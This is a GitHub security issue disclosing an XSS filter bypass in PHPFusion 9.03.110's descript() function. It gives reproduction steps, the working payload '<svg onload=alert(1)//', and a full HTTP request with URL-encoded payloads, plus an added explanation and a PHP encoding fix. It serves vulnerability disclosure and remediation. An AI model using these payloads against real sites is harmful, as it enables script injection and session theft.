Bypass preg pattern lead to Cross-site Scripting in descript() function #2373

Closed
KietNA-HPT opened this issue Aug 25, 2021 · 3 comments
Labels: Security (All security fixes or optimization)

KietNA-HPT commented Aug 25, 2021

#KietNA From Inv1cta Team, HPT Cyber Security Center

Sorry for bad English
Describe the bug

The preg patterns in the descript() function filter HTML tags without "//"; an authenticated user can trigger XSS by appending "//" at the end of the text.
Version

PHPFusion version: PHPFusion 9.03.110

To Reproduce

Steps to reproduce the behavior:

  1. Go to any textarea form
  2. Add "<svg onload=alert(1)//" to the textarea form and submit
  3. When an authenticated user or admin uses the HTML preview function, the malicious script will be executed; the attacker can even store the malicious script when the admin publishes the submission

Screenshots

preg pattern filters HTML tags without "//" at the end of the HTML
[screenshot]

User previews and submits the submission
[screenshot]

Admin previews the user's submission
[screenshot]

Admin publishes the submission and the attacker can store the malicious script
[screenshot]

The attacker can store the malicious script in the forum via the post-new-thread function, without the admin browsing the post
[screenshot]

When the admin clicks on the Activity button, the script of user kietna will be executed
[screenshot]

Additional context

REQUEST:

POST /submit.php?stype=a HTTP/1.1
Host: 172.16.0.12:5554
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 395
Origin: http://172.16.0.12:5554
Connection: close
Referer: http://172.16.0.12:5554/submit.php?stype=a
Cookie: PHPSESSID=qhclrgdoah7rbv9l34fvj07h00; fusiony1dli_session=jjfp12qmql4s64caf8ob6eld2t; fusiony1dli_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0; fusiony1dli_user=1.1630015266.b9cf1c8d19231964f87b60503eb37b6cd23047438f61fe3b750f0d371a242ec6; fusiony1dli_admin=1.1630015307.2c32968c83f8c4c0224d5a0d4a0de496d62b98325c2754a38c3451087161671e; fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; fusionc4q8w_visited=yes; fusionc4q8w_lastvisit=1629852584; fusionc4q8w_user=2.1630031855.2d2e26d63d89a73447202a9978b3ff81a084dae1acbddeeb4c6fd5de86f85469
Upgrade-Insecure-Requests: 1

fusion_token=2-1629861818-8b90d545094236c6cc3daa34012b16531afc70a7d12df00e8dba976f92f37e84&form_id=submissionform&fusion_wKs75X=&article_subject=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_keywords=&article_cat=1&article_language%5B%5D=English&article_snippet=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_article=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&preview_article=Preview

RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 25 Aug 2021 03:25:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHPFusion 9.03.110
Last-Modified: Wed, 25 Aug 2021 03:25:25 GMT
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68868
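The bypass reported above comes down to a tag-stripping pattern that only fires once a closing ">" is present. The following is an added illustration, not PHPFusion's own descript() code: the naive filter, the function names and the inputs are assumptions, and it shows both the miss and the output-encoding fix a preview feature should rely on instead.

```php
<?php
// Added illustration, not PHPFusion's descript() implementation. A blacklist
// regex that needs a closing ">" cannot see an unterminated tag; encoding the
// text for the HTML body context is the robust alternative.

// Hypothetical tag-stripping filter in the style of a preg blacklist: it only
// matches once the closing ">" of the tag is present.
function naive_strip_tags(string $text): string {
    return preg_replace('#<\s*/?\s*[a-z][^>]*>#i', '', $text);
}

// Robust handling for a preview: treat the submission as data and encode it for
// the HTML context rather than trying to enumerate dangerous tags.
function html_encode(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: a closed tag and the unterminated variant from the issue.
$closed   = '<svg onload=alert(1)>';
$unclosed = '<svg onload=alert(1)//';

// The closed form is stripped; the unclosed form passes through untouched and
// the browser still parses it as a tag once a later ">" in the page closes it.
var_dump(naive_strip_tags($closed));    // string(0) ""
var_dump(naive_strip_tags($unclosed));  // string(22) "<svg onload=alert(1)//"

// Encoding neutralises both: "<" becomes "&lt;", so no element is created.
var_dump(html_encode($unclosed));       // string(25) "&lt;svg onload=alert(1)//"
```

Whether the submission is previewed or published, the same encoding (or a real HTML sanitizer that parses the markup) must be applied at output time, since the filter is bypassed before storage.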
KietNA-HPT changed the title from "Cross-site Scripting bypass in descript() function" to "Bypass preg pattern lead to Cross-site Scripting in descript() function" on Aug 25, 2021
KietNA-HPT (Author) commented:

Hi @RobiNN1 @FrederickChan,
Please review this issue ^^! Thanks very much

FrederickChan self-assigned this Aug 26, 2021
FrederickChan added the Security (All security fixes or optimization) label Aug 26, 2021
KietNA-HPT (Author) commented:

Hi @FrederickChan!
Sorry to trouble you, but can you request a CVE for me?
Thank you very much!

RobiNN1 (Contributor) commented Sep 1, 2021

You have to request a CVE yourself if you want. This is not our job.
